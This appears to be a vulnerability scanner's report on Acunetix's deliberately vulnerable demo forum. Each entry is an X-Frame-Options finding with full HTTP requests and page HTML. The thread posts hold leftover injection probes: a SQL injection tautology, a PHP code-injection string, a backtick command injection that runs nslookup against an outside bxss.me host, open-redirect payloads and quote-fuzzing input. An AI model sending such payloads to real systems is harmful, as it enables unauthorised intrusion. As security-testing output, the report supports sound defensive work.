URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4126 |
Response Body - size: 4,126 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4136 |
Response Body - size: 4,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>//xfs.bxss.me</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4198 |
Response Body - size: 4,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2>(0+5+627-627) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2>(0+5+627-627) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2>(0+5+627-627) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4147 |
Response Body - size: 4,147 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>';print(md5(31337));$a='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4217 |
Response Body - size: 4,217 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>`(nslookup hitizikixkvrf2e498.bxss.me||perl -e "gethostbyname('hitizikixkvrf2e498.bxss.me')")`</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4139 |
Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>12345'"\'\");|]*</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:41 GMT Content-Length: 4136 |
Response Body - size: 4,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>/\xfs.bxss.me</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
